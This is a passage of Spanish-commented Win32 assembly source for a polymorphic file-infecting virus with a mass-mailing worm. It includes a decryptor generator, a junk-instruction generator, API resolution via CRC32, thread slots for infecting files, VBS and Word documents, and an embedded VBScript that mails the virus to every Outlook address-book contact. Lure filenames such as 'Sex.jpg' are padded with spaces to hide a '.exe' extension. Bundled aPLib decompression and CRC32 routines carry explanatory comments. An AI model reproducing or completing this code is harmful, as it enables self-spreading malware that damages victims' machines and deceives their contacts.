MOV AL, 05Bh
|
||
STOSB
|
||
MOV AL, 0BAh
|
||
STOSB
|
||
MOV DWO [GuardaDelta], EDI
|
||
MOV EAX, DWO [Origen]
|
||
STOSD
|
||
MOV AX, 0D329h
|
||
STOSW
|
||
MOV AX, 0DD87h
|
||
STOSW
|
||
JMP @Popear_Delta_R
|
||
|
||
@Popear_Delta_IV:
|
||
MOV AL, 05Ah
|
||
STOSB
|
||
MOV AL, 068h
|
||
STOSB
|
||
MOV DWO [GuardaDelta], EDI
|
||
MOV EAX, DWO [Origen]
|
||
STOSD
|
||
MOV AL, 05Dh
|
||
STOSB
|
||
MOV AX, 0D587h
|
||
STOSW
|
||
MOV AX, 0D529h
|
||
STOSW
|
||
JMP @Popear_Delta_R
|
||
|
||
RET
|
||
|
||
@Meter_Tama¤o:
|
||
|
||
PUSH 04h
|
||
POP EBX
|
||
CALL @Aleatorio
|
||
OR EAX, EAX
|
||
JZ @Meter_Tama¤o_I
|
||
CMP EAX, 01h
|
||
JZ @Meter_Tama¤o_II
|
||
CMP EAX, 02h
|
||
JZ @Meter_Tama¤o_III
|
||
CMP EAX, 03h
|
||
JZ @Meter_Tama¤o_IV
|
||
|
||
JMP @Meter_Tama¤o_III
|
||
|
||
@Meter_Tama¤oR:
|
||
|
||
RET
|
||
|
||
@Meter_Tama¤o_I:
|
||
MOV AL, 0B9h
|
||
STOSB
|
||
MOV EAX, DWO [Tama¤o]
|
||
STOSD
|
||
JMP @Meter_Tama¤oR
|
||
|
||
@Meter_Tama¤o_II:
|
||
MOV AL, 068h
|
||
STOSB
|
||
MOV EAX, DWO [Tama¤o]
|
||
STOSD
|
||
MOV AL, 059h
|
||
STOSB
|
||
JMP @Meter_Tama¤oR
|
||
|
||
@Meter_Tama¤o_III:
|
||
MOV AL, 0BAh
|
||
STOSB
|
||
MOV EAX, DWO [Tama¤o]
|
||
NOT EAX
|
||
STOSD
|
||
MOV AX, 0CA87h
|
||
STOSW
|
||
MOV AX, 0D1F7h
|
||
STOSW
|
||
JMP @Meter_Tama¤oR
|
||
|
||
@Meter_Tama¤o_IV:
|
||
XOR EBX, EBX
|
||
DEC EBX
|
||
CALL @Aleatorio
|
||
XCHG EDX, EAX
|
||
|
||
MOV AL, 068h
|
||
STOSB
|
||
MOV EAX, EDX
|
||
STOSD
|
||
MOV AL, 058h
|
||
STOSB
|
||
MOV AL, 035h
|
||
STOSB
|
||
MOV EAX, DWO [Tama¤o]
|
||
XOR EAX, EDX
|
||
STOSD
|
||
MOV AL, 091h
|
||
STOSB
|
||
JMP @Meter_Tama¤oR
|
||
|
||
@Colocar_LEA:
|
||
|
||
PUSH 03h
|
||
POP EBX
|
||
CALL @Aleatorio
|
||
OR EAX, EAX
|
||
JZ @Colocar_Lea_I
|
||
CMP EAX, 01h
|
||
JZ @Colocar_Lea_II
|
||
CMP EAX, 02h
|
||
JZ @Colocar_Lea_III
|
||
|
||
JMP @Colocar_Lea_II
|
||
|
||
@Colocar_LEAR:
|
||
|
||
RET
|
||
|
||
@Colocar_LEA_I:
|
||
MOV AX, 0BD8Dh
|
||
STOSW
|
||
MOV EAX, DWO [Origen]
|
||
STOSD
|
||
JMP @Colocar_LEAR
|
||
|
||
@Colocar_LEA_II:
|
||
MOV AL, 0BFh
|
||
STOSB
|
||
MOV EAX, DWO [Origen]
|
||
STOSD
|
||
MOV AX, 0EF01h
|
||
STOSW
|
||
JMP @Colocar_LEAR
|
||
|
||
@Colocar_LEA_III:
|
||
MOV AL, 068h
|
||
STOSB
|
||
MOV EAX, DWO [Origen]
|
||
STOSD
|
||
MOV AL, 05Ah
|
||
STOSB
|
||
MOV AX, 0EA01h
|
||
STOSW
|
||
MOV AX, 0D787h
|
||
STOSW
|
||
JMP @Colocar_LEAR
|
||
|
||
@SumaCuatro:
|
||
|
||
PUSH 04h
|
||
POP EBX
|
||
CALL @Aleatorio
|
||
OR EAX, EAX
|
||
JZ @SumaCuatro_I
|
||
CMP EAX, 01h
|
||
JZ @SumaCuatro_II
|
||
CMP EAX, 02h
|
||
JZ @SumaCuatro_III
|
||
CMP EAX, 03h
|
||
JZ @SumaCuatro_IV
|
||
|
||
JMP @SumaCuatro_III
|
||
|
||
@SumaCuatroR:
|
||
|
||
RET
|
||
|
||
@SumaCuatro_I:
|
||
MOV AX, 0C781h
|
||
STOSW
|
||
MOV EAX, 00000004h
|
||
STOSD
|
||
JMP @SumaCuatroR
|
||
|
||
@SumaCuatro_II:
|
||
MOV EAX, 47474747h
|
||
STOSD
|
||
JMP @SumaCuatroR
|
||
|
||
@SumaCuatro_III:
|
||
MOV AL, 47h
|
||
STOSB
|
||
MOV AX, 0C781h
|
||
STOSW
|
||
MOV EAX, 00000002h
|
||
STOSD
|
||
MOV AL, 47h
|
||
STOSB
|
||
JMP @SumaCuatroR
|
||
|
||
@SumaCuatro_IV:
|
||
MOV AX, 0C781h
|
||
STOSW
|
||
MOV EAX, 00000003h
|
||
STOSD
|
||
MOV AL, 47h
|
||
STOSB
|
||
JMP @SumaCuatroR
|
||
|
||
; Generador de basura! Mega Lamer!!!
|
||
|
||
@Basura:
|
||
|
||
PUSH 10d
|
||
POP ECX
|
||
|
||
@BasLoop:
|
||
|
||
PUSH 08d
|
||
POP EBX
|
||
CALL @Aleatorio
|
||
|
||
OR EAX, EAX
|
||
JZ @Basura_1
|
||
CMP EAX, 1h
|
||
JZ @Basura_2
|
||
CMP EAX, 2h
|
||
JZ @Basura_3
|
||
CMP EAX, 3h
|
||
JZ @Basura_4
|
||
CMP EAX, 4h
|
||
JZ @Basura_5
|
||
CMP EAX, 5h
|
||
JZ @Basura_6
|
||
CMP EAX, 6h
|
||
JZ @Basura_7
|
||
|
||
JMP @Basura_1
|
||
|
||
@BasuraR:
|
||
|
||
LOOP @BasLoop
|
||
|
||
RET
|
||
|
||
@Basura_1:
|
||
|
||
PUSH 07h
|
||
POP EBX
|
||
CALL @Aleatorio
|
||
LEA ESI, OFS [@B1_Tabla]
|
||
ADD ESI, EAX
|
||
MOVSB
|
||
|
||
XOR EBX, EBX
|
||
DEC EBX
|
||
CALL @Aleatorio
|
||
STOSD
|
||
JMP @BasuraR
|
||
|
||
@B1_Tabla:
|
||
DB 0B8h ; MOV EAX
|
||
DB 0BBh ; MOV EBX
|
||
DB 0BAh ; MOV EDX
|
||
DB 0BEh ; MOV ESI
|
||
DB 005h ; ADD EAX
|
||
DB 02Dh ; SUB EAX
|
||
DB 035h ; XOR EAX
|
||
DB 015h ; ADC EAX
|
||
|
||
@Basura_2:
|
||
|
||
PUSH 15d
|
||
POP EBX
|
||
CALL @Aleatorio
|
||
ADD EAX, EAX
|
||
LEA ESI, OFS [@B2_Tabla]
|
||
ADD ESI, EAX
|
||
MOVSW
|
||
|
||
XOR EBX, EBX
|
||
DEC EBX
|
||
CALL @Aleatorio
|
||
STOSD
|
||
|
||
JMP @BasuraR
|
||
|
||
@B2_Tabla:
|
||
DB 081h, 0C3h ; ADD EBX
|
||
DB 081h, 0C2h ; ADD EDX
|
||
DB 081h, 0C6h ; ADD ESI
|
||
DB 081h, 0EBh ; SUB EBX
|
||
DB 081h, 0EAh ; SUB EDX
|
||
DB 081h, 0EEh ; SUB ESI
|
||
DB 081h, 0F6h ; XOR ESI
|
||
DB 081h, 0F2h ; XOR EDX
|
||
DB 081h, 0F3h ; XOR EBX
|
||
DB 081h, 0D3h ; ADC EBX
|
||
DB 081h, 0D2h ; ADC EDX
|
||
DB 081h, 0D6h ; ADC ESI
|
||
DB 069h, 0C0h ; IMUL EAX
|
||
DB 069h, 0DBh ; IMUL EBX
|
||
DB 069h, 0D2h ; IMUL EDX
|
||
DB 069h, 0F6h ; IMUL ESI
|
||
|
||
@Basura_3:
|
||
|
||
PUSH 35d
|
||
POP EBX
|
||
CALL @Aleatorio
|
||
ADD EAX, EAX
|
||
LEA ESI, OFS [@B3_Tabla]
|
||
ADD ESI, EAX
|
||
MOVSW
|
||
|
||
JMP @BasuraR
|
||
|
||
@B3_Tabla:
|
||
DB 001h, 0D8h ; ADD EAX, EBX
|
||
DB 001h, 0D0h ; ADD EAX, EDX
|
||
DB 001h, 0F0h ; ADD EAX, ESI
|
||
DB 001h, 0D3h ; ADD EBX, EDX
|
||
DB 001h, 0F3h ; ADD EBX, ESI
|
||
DB 001h, 0C3h ; ADD EBX, EAX
|
||
DB 001h, 0DAh ; ADD EDX, EBX
|
||
DB 001h, 0F2h ; ADD EDX, ESI
|
||
DB 001h, 0C2h ; ADD EDX, EAX
|
||
DB 001h, 0DEh ; ADD ESI, EBX
|
||
DB 001h, 0D6h ; ADD ESI, EDX
|
||
DB 001h, 0C6h ; ADD ESI, EAX
|
||
DB 029h, 0D8h ; SUB EAX, EBX
|
||
DB 029h, 0D0h ; SUB EAX, EDX
|
||
DB 029h, 0F0h ; SUB EAX, ESI
|
||
DB 029h, 0C3h ; SUB EBX, EAX
|
||
DB 029h, 0D3h ; SUB EBX, EDX
|
||
DB 029h, 0F3h ; SUB EBX, ESI
|
||
DB 029h, 0C2h ; SUB EDX, EAX
|
||
DB 029h, 0DAh ; SUB EDX, EBX
|
||
DB 029h, 0F2h ; SUB EDX, ESI
|
||
DB 029h, 0C6h ; SUB ESI, EAX
|
||
DB 029h, 0DEh ; SUB ESI, EBX
|
||
DB 029h, 0D6h ; SUB ESI, EDX
|
||
DB 031h, 0D8h ; XOR EAX, EBX
|
||
DB 031h, 0D0h ; XOR EAX, EDX
|
||
DB 031h, 0F0h ; XOR EAX, ESI
|
||
DB 031h, 0C3h ; XOR EBX, EAX
|
||
DB 031h, 0D3h ; XOR EBX, EDX
|
||
DB 031h, 0F3h ; XOR EBX, ESI
|
||
DB 031h, 0C2h ; XOR EDX, EAX
|
||
DB 031h, 0DAh ; XOR EDX, EBX
|
||
DB 031h, 0F2h ; XOR EDX, ESI
|
||
DB 031h, 0C6h ; XOR ESI, EAX
|
||
DB 031h, 0DEh ; XOR ESI, EBX
|
||
DB 031h, 0D6h ; XOR ESI, EDX
|
||
|
||
@Basura_4:
|
||
MOV AL, 068h ; PUSH
|
||
STOSB
|
||
XOR EBX, EBX
|
||
DEC EBX
|
||
CALL @Aleatorio
|
||
STOSD
|
||
|
||
PUSH 03h
|
||
POP EBX
|
||
CALL @Aleatorio
|
||
LEA ESI, OFS [@B4_Tabla]
|
||
ADD ESI, EAX
|
||
MOVSB
|
||
|
||
JMP @BasuraR
|
||
|
||
@B4_Tabla:
|
||
DB 058h ; POP EAX
|
||
DB 05Bh ; POP EBX
|
||
DB 05Ah ; POP EDX
|
||
DB 05Eh ; POP ESI
|
||
|
||
@Basura_5:
|
||
PUSH 11d
|
||
POP EBX
|
||
CALL @Aleatorio
|
||
LEA ESI, OFS [@B5_Tabla]
|
||
ADD ESI, EAX
|
||
MOVSB
|
||
|
||
JMP @BasuraR
|
||
|
||
@B5_Tabla:
|
||
DB 040h ; inc eax
|
||
DB 043h ; inc ebx
|
||
DB 042h ; inc edx
|
||
DB 046h ; inc esi
|
||
DB 048h ; dec eax
|
||
DB 04Bh ; dec ebx
|
||
DB 04Ah ; dec edx
|
||
DB 04Eh ; dec esi
|
||
DB 093h ; xchg ebx,eax
|
||
DB 092h ; xchg edx,eax
|
||
DB 096h ; xchg esi,eax
|
||
DB 093h ; xchg ebx,eax
|
||
|
||
@Basura_6:
|
||
PUSH 13d
|
||
POP EBX
|
||
CALL @Aleatorio
|
||
LEA ESI, OFS [@B6_Tabla]
|
||
ADD EAX, EAX
|
||
ADD ESI, EAX
|
||
MOVSW
|
||
|
||
JMP @BasuraR
|
||
|
||
@B6_Tabla:
|
||
DB 0F7h, 0D0h ; not eax
|
||
DB 0F7h, 0D3h ; not ebx
|
||
DB 0F7h, 0D2h ; not edx
|
||
DB 0F7h, 0D6h ; not esi
|
||
DB 0F7h, 0D8h ; neg eax
|
||
DB 0F7h, 0DBh ; neg ebx
|
||
DB 0F7h, 0DAh ; neg edx
|
||
DB 0F7h, 0DEh ; neg esi
|
||
DB 087h, 0DAh ; xchg ebx,edx
|
||
DB 087h, 0DEh ; xchg ebx,esi
|
||
DB 087h, 0D3h ; xchg edx,ebx
|
||
DB 087h, 0D6h ; xchg edx,esi
|
||
DB 087h, 0F3h ; xchg esi,ebx
|
||
DB 087h, 0F2h ; xchg esi,edx
|
||
|
||
@Basura_7:
|
||
PUSH 31d
|
||
POP EBX
|
||
CALL @Aleatorio
|
||
LEA ESI, OFS [@B7_Tabla]
|
||
ADD EAX, EAX
|
||
ADD ESI, EAX
|
||
MOVSW
|
||
XOR EBX, EBX
|
||
DEC EBX
|
||
CALL @Aleatorio
|
||
STOSB
|
||
|
||
JMP @BasuraR
|
||
|
||
@B7_Tabla:
|
||
DB 0C1h, 0D0h ; rcl eax
|
||
DB 0C1h, 0D3h ; rcl ebx
|
||
DB 0C1h, 0D2h ; rcl edx
|
||
DB 0C1h, 0D6h ; rcl esi
|
||
DB 0C1h, 0D8h ; rcr eax
|
||
DB 0C1h, 0DBh ; rcr ebx
|
||
DB 0C1h, 0DAh ; rcr edx
|
||
DB 0C1h, 0DEh ; rcr esi
|
||
DB 0C1h, 0C0h ; rol eax
|
||
DB 0C1h, 0C3h ; rol ebx
|
||
DB 0C1h, 0C2h ; rol edx
|
||
DB 0C1h, 0C6h ; rol esi
|
||
DB 0C1h, 0C8h ; ror eax
|
||
DB 0C1h, 0CBh ; ror ebx
|
||
DB 0C1h, 0CAh ; ror edx
|
||
DB 0C1h, 0CEh ; ror esi
|
||
DB 0C1h, 0E0h ; shl eax
|
||
DB 0C1h, 0E3h ; shl ebx
|
||
DB 0C1h, 0E2h ; shl edx
|
||
DB 0C1h, 0E6h ; shl esi
|
||
DB 0C1h, 0F8h ; sar eax
|
||
DB 0C1h, 0FBh ; sar ebx
|
||
DB 0C1h, 0FAh ; sar edx
|
||
DB 0C1h, 0FEh ; sar esi
|
||
DB 0C1h, 0E0h ; shl eax
|
||
DB 0C1h, 0E3h ; shl ebx
|
||
DB 0C1h, 0E2h ; shl edx
|
||
DB 0C1h, 0E6h ; shl esi
|
||
DB 0C1h, 0E8h ; shr eax
|
||
DB 0C1h, 0EBh ; shr ebx
|
||
DB 0C1h, 0EAh ; shr edx
|
||
DB 0C1h, 0EEh ; shr esi
|
||
|
||
@SaveSemilla DB 8 DUP (00h)
|
||
|
||
Semilla_1 DD 00000000h
|
||
Semilla_2 DD 00000000h
|
||
Llave DD 00000000h
|
||
|
||
Origen DD 00000000h
|
||
Destino DD 00000000h
|
||
Tama¤o DD 00000000h
|
||
|
||
GuardaDelta DD 00000000h
|
||
GuardaDelta2 DD 00000000h
|
||
GuardaLoop DD 00000000h
|
||
|
||
Mierda_1 EQU 1A7FC23Bh
|
||
Mierda_2 EQU 000028B1h
|
||
Mierda_3 EQU 974D9DB5h
|
||
Mierda_4 EQU 0000F3C9h
|
||
|
||
PXPE ENDP
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
;***************************************************************
|
||
;* aPLib v0.22b - the smaller the better :) *
|
||
;* WASM & TASM assembler depacker *
|
||
;* *
|
||
;* Copyright (c) 1998-99 by - Jibz - All Rights Reserved *
|
||
;***************************************************************
|
||
|
||
;.386p
|
||
;.MODEL flat
|
||
|
||
;.CODE
|
||
|
||
;PUBLIC _aP_depack_asm
|
||
|
||
; int _aP_depack_asm(const void *src, void *dst)   - C calling convention
;   [ebp+8]  = src: aPLib-packed stream
;   [ebp+12] = dst: output buffer
;   returns EAX = number of bytes written to dst (stored into the PUSHAD
;   EAX slot at [ebp-4] before POPAD)
; Register roles inside: ESI = input pointer, EDI = output pointer,
; DL = bit buffer with an 80h sentinel, EBP = last match offset (the frame
; EBP is saved by the second PUSH EBP and restored at donedepacking).
; No bounds checking of any kind: dst must be large enough for the whole
; unpacked size and src must be a well-formed stream; a truncated or
; corrupted stream reads and writes past either buffer.
_aP_depack_asm:
push ebp
mov ebp, esp
pushad                          ; the EAX slot at [ebp-4] carries the return value
push ebp

mov esi, [ebp + 8] ; C calling convention
mov edi, [ebp + 12]

cld
mov dl, 80h                     ; empty bit buffer: sentinel bit only

literal:
movsb                           ; copy one literal byte
nexttag:
call getbit
jnc literal                     ; tag 0 -> literal

xor ecx, ecx
call getbit
jnc codepair                    ; tag 10 -> gamma-coded offset/length pair
xor eax, eax
call getbit
jnc shortmatch                  ; tag 110 -> one-byte offset/length
mov al, 10h                     ; tag 111 -> 4-bit offset, single byte
getmorebits:
call getbit
adc al, al
jnc getmorebits                 ; until the marker bit placed in 10h shifts out
jnz domatch_with_inc            ; offset != 0: copy one byte from EDI-eax
stosb                           ; offset 0: emit a zero byte (AL is 0 here)
jmp short nexttag
codepair:
call getgamma_no_ecx            ; ECX = gamma value (entered with ECX = 0)
dec ecx
loop normalcodepair             ; value != 2 -> an explicit offset follows
mov eax,ebp                     ; value == 2 -> reuse the last offset
call getgamma                   ; ECX = match length
jmp short domatch

shortmatch:
lodsb
shr eax, 1                      ; 7-bit offset; the shifted-out bit selects the length
jz donedepacking                ; offset 0 marks the end of the stream
adc ecx, 2                      ; length 2 or 3
mov ebp, eax
jmp short domatch

normalcodepair:
xchg eax, ecx
dec eax
shl eax, 8
lodsb                           ; offset = ((gamma - 3) << 8) | next byte
mov ebp, eax
call getgamma                   ; ECX = match length
cmp eax, 32000
jae domatch_with_2inc           ; offset >= 32000: length + 2
cmp eax, 1280
jae domatch_with_inc            ; offset >= 1280:  length + 1
cmp eax, 7fh
ja domatch                      ; 128 <= offset < 1280: unchanged
                                ; offset <= 7Fh: length + 2

domatch_with_2inc:
inc ecx

domatch_with_inc:
inc ecx
domatch:
push esi
mov esi, edi
sub esi, eax                    ; source = already-written output at EDI-offset
rep movsb                       ; overlapping copy is intended (run-length behaviour)
pop esi
jmp short nexttag

getbit:
add dl, dl                      ; shift the next bit into CF
jnz stillbitsleft
mov dl, [esi]                   ; buffer exhausted: reload a byte...
inc esi
adc dl, dl                      ; ...emit its top bit and re-insert the sentinel
stillbitsleft:
ret

getgamma:
xor ecx, ecx
getgamma_no_ecx:
inc ecx
getgammaloop:
call getbit
adc ecx, ecx                    ; append one data bit
call getbit
jc getgammaloop                 ; continuation bit set -> more digits
ret

donedepacking:
pop ebp                         ; restore the frame pointer saved after pushad
sub edi, [ebp + 12]
mov [ebp - 4], edi ; return unpacked length in eax

popad
pop ebp
ret
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
; Billy Belcebu's CRC32 calculator.
|
||
;
|
||
; CRC32 procedure
|
||
; --------------+
|
||
;
|
||
; input:
|
||
; ESI = Offset where code to calculate begins
|
||
; EDI = Size of that code
|
||
; output:
|
||
; EAX = CRC32 of given code
|
||
;
|
||
|
||
; Bit-serial CRC-32 with the reflected polynomial 0EDB88320h (applied as the
; two 16-bit halves 08320h / 0EDB8h below), initial value 0FFFFFFFFh and a
; final complement. The running CRC is kept as 16-bit pieces in CX (low
; half) and DX (high half) so the per-bit shift/xor can work on BX:AX.
;   In:  ESI -> buffer, EDI = length in bytes. Must be >= 1: the loop is
;        do-while, so a length of 0 runs 2^32 iterations and reads far past
;        the buffer.
;   Out: EAX = CRC32 of the buffer
;   Clobbers EBX, ECX, EDX and flags; DF is cleared; ESI is advanced by EDI
;   bytes and EDI ends at 0.
CRC32 proc
cld
xor ecx,ecx ; Optimized by me - 2 bytes
dec ecx ; less                  ; ecx = edx = 0FFFFFFFFh (initial CRC)
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb                           ; next input byte
xor al,cl                       ; fold it into the lowest CRC byte
mov cl,ch                       ; shift the CRC right by 8, byte by byte
mov ch,dl
mov dl,dh
mov dh,8                        ; DH doubles as the 8-bit loop counter
NextBitCRC:
shr bx,1
rcr ax,1                        ; BX:AX >>= 1, the bit shifted out lands in CF
jnc NoCRC
xor ax,08320h                   ; CF set: xor in the polynomial (low / high halves)
xor bx,0EDB8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx,eax                     ; merge this byte's contribution into the CRC
xor edx,ebx
dec edi ; 1 byte less
jnz NextByteCRC
not edx                         ; final complement
not ecx
mov eax,edx
rol eax,16                      ; EAX = (DX << 16) | CX
mov ax,cx
ret
CRC32 endp
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
; Generador de numeros aleatorios para uso general.
|
||
;
|
||
; EBX -> Limite Superior
|
||
|
||
; General-purpose pseudo-random number in [0, EBX).
; Two 4-byte samples - the low dword of RDTSC, then GetTickCount - are
; written to Mariconada and each is CRC32'ed; the two CRCs a and b are
; combined as (a OR b) XOR (a AND b), which equals a XOR b, and the result
; is reduced modulo EBX.
;   In:  EBX = exclusive upper bound (must be non-zero: DIV EBX faults on 0)
;   Out: EAX = value in [0, EBX)
;   Preserves EBX, ECX, EDX, EDI (TASM multi-operand PUSH/POP). Clobbers
;   ESI (CRC32 leaves it at Mariconada+4) and flags; DF is cleared by CRC32.
;   Not a security-grade generator: the only entropy is the two timers.
Random PROC

PUSH ECX EDX EDI EBX

LEA EDI, OFS [Mariconada]
RDTSC
STOSD                           ; Mariconada[0..3] = low dword of the TSC
PUSH 04h
POP EDI                         ; byte count for CRC32
LEA ESI, OFS [Mariconada]
CALL CRC32
XCHG EDX, EAX                   ; EDX = crc(TSC)

PUSH EDX
LEA EDI, OFS [Mariconada]
APICALL GetTickCount
STOSD                           ; Mariconada[0..3] = tick count
SUB EDI, 04h                    ; back to the start of Mariconada...
XCHG EDI, ESI                   ; ...and hand it to CRC32 as the source
PUSH 04h
POP EDI
CALL CRC32                      ; EAX = crc(tick count)
POP EDX                         ; EDX = crc(TSC)

PUSH EAX
OR EAX, EDX
POP ECX                         ; ECX = crc(tick count); EAX = a OR b
AND EDX, ECX                    ; EDX = a AND b

XOR EAX, EDX                    ; (a OR b) XOR (a AND b) == a XOR b

POP EBX                         ; the caller's limit
XOR EDX, EDX
DIV EBX
XCHG EDX, EAX                   ; return the remainder in EAX

POP EDI EDX ECX
RET

Mariconada DB 9 DUP (00h)

Random ENDP
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
; TABLA!
|
||
;
|
||
; Create -> 01h
|
||
; File -> 02h
|
||
; Map -> 03h
|
||
; View -> 04h
|
||
; Close -> 05h
|
||
; Get -> 06h
|
||
; Set -> 07h
|
||
; Find -> 08h
|
||
; Virtual -> 09h
|
||
; Window -> 0Ah
|
||
; Directory -> 0Bh
|
||
; Current -> 0Ch
|
||
; WaitFor -> 0Dh
|
||
; Thread -> 0Eh
|
||
|
||
HThread DD 00000000h
|
||
|
||
APIs_K32 DB 01h, 02h, "A", 00h
|
||
DB 01h, 02h, 03h, "pingA", 00h
|
||
DB 03h, 04h, "Of", 02h, 00h
|
||
DB "Unmap", 04h, "Of", 02h, 00h
|
||
DB 05h, "Handle", 00h
|
||
DB 06h, 02h, "Size", 00h
|
||
DB 07h, 02h, "Pointer", 00h
|
||
DB 07h, "EndOf", 02h, 00h
|
||
DB 07h, 02h, "AttributesA", 00h
|
||
DB "Write", 02h, 00h
|
||
DB 08h, "First", 02h, "A", 00h
|
||
DB 08h, "Next", 02h, "A", 00h
|
||
DB 08h, 05h, 00h
|
||
DB 09h, "Alloc", 00h
|
||
DB 09h, "Free", 00h
|
||
DB 06h, 0Ah, "s", 0Bh, "A", 00h
|
||
DB 06h, 0Ch, 0Bh, "A", 00h
|
||
DB 07h, 0Ch, 0Bh, "A", 00h
|
||
DB 01h, 0Eh, 00h
|
||
DB "Exit", 0Eh, 00h
|
||
DB 0Dh, "MultipleObjects", 00h
|
||
DB 0Dh, "SingleObject", 00h
|
||
DB 06h, "TickCount", 00h
|
||
DB "LoadLibraryA", 00h
|
||
DB "Delete", 02h, "A", 00h
|
||
DB 07h, 0Eh, "Priority", 00h
|
||
DB 0FFh
|
||
|
||
CreateFileA DD 00000000h
|
||
CreateFileMappingA DD 00000000h
|
||
MapViewOfFile DD 00000000h
|
||
UnmapViewOfFile DD 00000000h
|
||
CloseHandle DD 00000000h
|
||
GetFileSize DD 00000000h
|
||
SetFilePointer DD 00000000h
|
||
SetEndOfFile DD 00000000h
|
||
SetFileAttributesA DD 00000000h
|
||
WriteFile DD 00000000h
|
||
FindFirstFileA DD 00000000h
|
||
FindNextFileA DD 00000000h
|
||
FindClose DD 00000000h
|
||
VirtualAlloc DD 00000000h
|
||
VirtualFree DD 00000000h
|
||
GetWindowsDirectoryA DD 00000000h
|
||
GetCurrentDirectoryA DD 00000000h
|
||
SetCurrentDirectoryA DD 00000000h
|
||
CreateThread DD 00000000h
|
||
ExitThread DD 00000000h
|
||
WaitForMultipleObjects DD 00000000h
|
||
WaitForSingleObject DD 00000000h
|
||
GetTickCount DD 00000000h
|
||
LoadLibraryA DD 00000000h
|
||
DeleteFileA DD 00000000h
|
||
SetThreadPriority DD 00000000h
|
||
|
||
KERNEL32 DD 00000000h
|
||
|
||
Thread_Directa DD 00000000h
|
||
Thread_WormVBS DD 00000000h
|
||
Thread_IWord DD 00000000h
|
||
Thread_Host DD 00000000h
|
||
|
||
Listo_Directa DB 00h
|
||
|
||
GetProcAddress DD 00000000h
|
||
Exports DD 00000000h
|
||
|
||
CRC32_GetProcAddress EQU 0FFC97C1Fh
|
||
l_GetProcAddress EQU 0Fh
|
||
|
||
Scriptum DD 00000000h
|
||
GuardaNom DD 00000000h
|
||
LargoVBS DB 00h
|
||
FHandle_WVBS DD 00000000h
|
||
MHandle_WVBS DD 00000000h
|
||
BaseMap_WVBS DD 00000000h
|
||
|
||
Gusano_VBS LABEL NEAR
|
||
DB 'On Error Resume Next', 0Dh, 0Ah
|
||
DB 'Set Outlook = CreateObject("OutLook.Application")', 0Dh, 0Ah
|
||
DB 'If ( Outlook <> "" ) Then', 0Dh, 0Ah
|
||
DB 'With Outlook', 0Dh, 0Ah
|
||
DB 'Set MAPI = .GetNameSpace("MAPI")', 0Dh, 0Ah
|
||
DB 'End With', 0Dh, 0Ah
|
||
DB 'With MAPI', 0Dh, 0Ah
|
||
DB 'Set AddrList = .AddressLists', 0Dh, 0Ah
|
||
DB 'End With', 0Dh, 0Ah
|
||
DB 'For I = 1 to AddrList.Count', 0Dh, 0Ah
|
||
DB 'With OutLook', 0Dh, 0Ah
|
||
DB 'Set NuevoMail = .CreateItem(0)', 0Dh, 0Ah
|
||
DB 'End With', 0Dh, 0Ah
|
||
DB 'Set LibroActual = AddrList.Item(I)', 0Dh, 0Ah
|
||
DB 'With NuevoMail', 0Dh, 0Ah
|
||
DB '.Attachments.Add "'
|
||
L_Gusano_VBS EQU $-Gusano_VBS
|
||
|
||
Gusano_VBS2 LABEL NEAR
|
||
DB '"', 0Dh, 0Ah
|
||
DB 'End With', 0Dh, 0Ah
|
||
DB 'Set Yuca = LibroActual.AddressEntries', 0Dh, 0Ah
|
||
DB 'With Yuca', 0Dh, 0Ah
|
||
DB 'For J = 1 to .Count', 0Dh, 0Ah
|
||
DB 'With NuevoMail', 0Dh, 0Ah
|
||
DB 'Set bajo = .Recipients', 0Dh, 0Ah
|
||
DB 'bajo.Add Yuca(J)', 0Dh, 0Ah
|
||
DB 'End With', 0Dh, 0Ah
|
||
DB 'Next', 0Dh, 0Ah
|
||
DB 'End With', 0Dh, 0Ah
|
||
DB 'With NuevoMail', 0Dh, 0Ah
|
||
DB '.Send', 0Dh, 0Ah
|
||
DB 'End With', 0Dh, 0Ah
|
||
DB 'Next', 0Dh, 0Ah
|
||
DB 'Outlook.Quit', 0Dh, 0Ah
|
||
DB 'End If', 0Dh, 0Ah
|
||
L_Gusano_VBS2 EQU $-Gusano_VBS2
|
||
|
||
Nombres_Varios DB "XD", 00h
|
||
DB "Sex.jpg", 20d DUP (" "), ".exe", 00h
|
||
DB "Porno.gif", 20d DUP (" "), ".exe", 00h
|
||
DB "Free_XXX.jpg", 20d DUP (" "), ".exe", 00h
|
||
DB "Great_Music.mp3", 20d DUP (" "), ".exe", 00h
|
||
DB "Check_This.jpg", 20d DUP (" "), ".exe", 00h
|
||
DB "Cool_Pics.gif", 20d DUP (" "), ".exe", 00h
|
||
DB "Love_Story.html", 20d DUP (" "), ".exe", 00h
|
||
DB "Sexy_Screensaver.scr", 00h
|
||
DB "Free_Love_Screensaver.scr", 00h
|
||
DB "Eat_My_Shorts.scr", 00h
|
||
|
||
Raxelp_vbs DB "raxelp.vbs", 00h
|
||
WScript_exe DB "wscript.exe", 00h
|
||
|
||
Tabla_Hex DB "0123456789ABCDEF", 00h
|
||
|
||
FHandle_IW DD 00000000h
|
||
MHandle_IW DD 00000000h
|
||
BaseMap_IW DD 00000000h
|
||
Tama¤o_IW DD 00000000h
|
||
Memoria_IW DD 00000000h
|
||
